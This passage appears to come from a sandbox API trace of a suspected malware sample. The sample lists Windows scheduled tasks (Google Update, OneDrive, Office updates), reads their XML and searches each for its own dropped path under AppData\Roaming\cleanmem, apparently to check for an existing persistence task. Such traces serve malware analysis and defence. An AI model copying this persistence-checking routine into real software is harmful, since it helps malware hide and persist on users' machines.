pXml=0x12e338*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0227.092] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.119] IUnknown:Release (This=0x296ab0) returned 0x0 [0227.119] IRegisteredTaskCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000005, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x12e330 | out: ppRegisteredTask=0x12e330*=0x296ab0) returned 0x0 [0227.119] IRegisteredTask:get_Name (in: This=0x296ab0, pName=0x12e350 | out: pName=0x12e350*="OneDrive Standalone Update Task-S-1-5-21-2345716840-1148442690-1481144037-1000") returned 0x0 [0227.119] IRegisteredTask:get_Xml (in: This=0x296ab0, pXml=0x12e338 | out: pXml=0x12e338*="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n") returned 0x0 [0227.123] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.148] IUnknown:Release (This=0x296ab0) returned 0x0 [0227.148] IUnknown:Release (This=0x2969b0) returned 0x0 [0227.148] ITaskFolder:GetFolders (in: This=0x3cdf80, flags=0, ppFolders=0x12e348 | out: ppFolders=0x12e348*=0x2969b0) returned 0x0 [0227.151] ITaskFolderCollection:get_Count (in: This=0x2969b0, pCount=0x12e4b8 | out: pCount=0x12e4b8*=3) returned 0x0 [0227.151] ITaskFolderCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0xfffffffffffffffe), ppFolder=0x12e330 | out: ppFolder=0x12e330*=0x296ac0) returned 0x0 [0227.151] ITaskFolder:GetTasks (in: This=0x296ac0, flags=1, ppTasks=0x12e1b0 | out: ppTasks=0x12e1b0*=0x296b30) returned 0x0 [0227.152] IRegisteredTaskCollection:get_Count (in: This=0x296b30, pCount=0x12e310 | out: pCount=0x12e310*=0) returned 0x0 [0227.152] IUnknown:Release (This=0x296b30) returned 0x0 [0227.152] ITaskFolder:GetFolders (in: This=0x296ac0, flags=0, ppFolders=0x12e1b8 | out: ppFolders=0x12e1b8*=0x296b30) returned 0x0 [0227.155] ITaskFolderCollection:get_Count (in: This=0x296b30, pCount=0x12e328 | out: pCount=0x12e328*=3) returned 0x0 [0227.155] ITaskFolderCollection:get_Item (in: This=0x296b30, index=0x12e1f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x12e1a0 | out: ppFolder=0x12e1a0*=0x296c70) returned 0x0 [0227.155] ITaskFolder:GetTasks (in: This=0x296c70, flags=1, ppTasks=0x12e020 | out: ppTasks=0x12e020*=0x296cf0) returned 0x0 [0227.159] IRegisteredTaskCollection:get_Count (in: This=0x296cf0, pCount=0x12e180 | out: pCount=0x12e180*=6) returned 0x0 [0227.159] IRegisteredTaskCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12e010 | out: ppRegisteredTask=0x12e010*=0x296e30) returned 0x0 [0227.160] IRegisteredTask:get_Name (in: This=0x296e30, pName=0x12e030 | out: pName=0x12e030*="Office Automatic Updates") returned 0x0 [0227.160] IRegisteredTask:get_Xml (in: This=0x296e30, pXml=0x12e018 | out: pXml=0x12e018*="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n") returned 0x0 [0227.162] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n 